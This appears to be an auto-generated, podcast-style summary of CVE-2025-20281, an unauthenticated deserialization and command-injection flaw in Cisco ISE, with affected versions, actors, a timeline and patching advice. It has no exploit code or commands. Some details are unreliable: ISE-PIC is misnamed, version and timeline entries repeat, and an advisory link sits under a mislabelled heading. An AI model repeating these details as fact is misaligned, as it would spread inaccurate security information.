Cisco ISE: Unauthenticated deserialization leading to command injection and remote code execution in Cisco ISE API (CVE-2025-20281) (CVE-2025-20281) #shorts

Summary

Welcome to today’s podcast. We’re spotlighting CVE-2025-20281, a critical vulnerability in Cisco’s Identity Services Engine, or ISE, that allows unauthenticated, remote attackers to execute arbitrary code as root. Disclosed in late June 2025 and updated through July, this flaw poses a serious risk to any organization running impacted versions of the software.

Product details

The affected products are Cisco Identity Services Engine (ISE) and Cisco ISE-PIC, specifically versions 3.3.0, 3.3 Patch 1 through 6, 3.3 Patch 2, 3.3 Patch 3, 3.3 Patch 4, 3.3 Patch 5, 3.3 Patch 6, 3.4.0, and 3.4 Patch 1. These solutions handle policy enforcement, network access control, and device profiling, making them a critical component of many enterprise security architectures.

Vulnerability type summary

CVE-2025-20281 falls under the category of Improper Neutralization of Special Elements in Output Used by a Downstream Component, often called an injection vulnerability. In this case, insufficient input validation and unsafe deserialization in a specific ISE API endpoint enable an attacker to inject malicious data that results in command execution on the host operating system.

Details of the vulnerability

Researchers at the Zero Day Initiative initially reported a dangerous deserialization flaw in a specific ISE API. By sending a crafted request containing maliciously formed objects, an unauthenticated attacker can trigger remote code execution with root privileges. Security expert Bobby Gould publicly demonstrated a working exploit, showing how simple it is to chain the injection payload into system commands. No valid credentials are needed, making the exposure wide open to Internet-facing or improperly segmented ISE deployments.

Conclusion

This vulnerability demands immediate action. Cisco has released patches for all affected versions, so administrators should upgrade to the latest ISE release without delay. In addition, we recommend restricting API access to trusted networks, applying strong segmentation, and monitoring logs for unusual deserialization errors. That wraps up our coverage of CVE-2025-20281. Stay safe, stay patched, and join us next time for more security insights.

This chain involves the following actors

• Attacker: Unauthenticated remote adversary seeking remote code execution
• Security Researcher (ZDI / Bobby Gould): Proof-of-concept developer and demonstrator

This following systems are involved

• Cisco Identity Services Engine (ISE) (Centralized network access control and policy management): Primary vulnerable application server
• Cisco ISE Policy Intelligence Component (ISE-PIC) (Policy analysis and threat intelligence module): Supplementary vulnerable API provider
• Underlying Operating System (Host environment for Cisco ISE services): Execution environment for injected commands

Attack entry point

• Unauthenticated ISE API endpoint: A REST API method in ISE/ISE-PIC that deserializes user-supplied input without proper validation, exposed on default management ports

Remediation actions

Exploitation actions

• https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-unauth-rce-ZAd2GnJ6
• [2025-07-25] ZDI reported a deserialization vulnerability in Cisco ISE API leading to command injection and remote code execution.
• [2025-07-28] Security researcher Bobby Gould demonstrates exploit for critical Cisco ISE vulnerability CVE-2025-20281.
• [2025-07-28] Security researcher Bobby Gould demonstrates exploit for CVE-2025-20281 in Cisco ISE.